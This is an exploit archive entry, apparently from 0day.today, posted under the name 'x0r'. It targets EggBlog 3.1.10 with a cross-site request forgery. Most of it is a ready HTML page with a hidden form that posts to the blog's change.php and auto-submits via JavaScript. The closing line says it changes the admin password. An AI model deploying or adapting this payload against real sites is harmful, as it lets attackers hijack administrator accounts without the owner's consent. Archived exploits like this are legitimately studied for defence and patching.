id: 4582
date: 01/01/2009
title: EggBlog 3.1.10 Change Admin Pass CSRF Vulnerability
author: x0r
cves: 

===================================================
EggBlog 3.1.10 Change Admin Pass CSRF Vulnerability
===================================================


|                                                                        | 
| Project: EggBlog v 3.1.10                                              |
| Author: x0r                                                            |
|________________________________________________________________________|
       
Code:

        <html>
        <title>x0r :P </title>
                        <form id="forum-form" name="forumform"
method="post" action="http://[site]/[path]/change.php">                    
    
                                                <input type="hidden"
size="30" id="forumpassword" name="password" />
                                                <input type="hidden"
name="submit" value="Submit" />
<script>document.forumform.submit()</script> 
       
                        </form>
        </HTML>

 With this csrf you can change the admin pass ^ ^



#  0day.today [2023-03-24]  #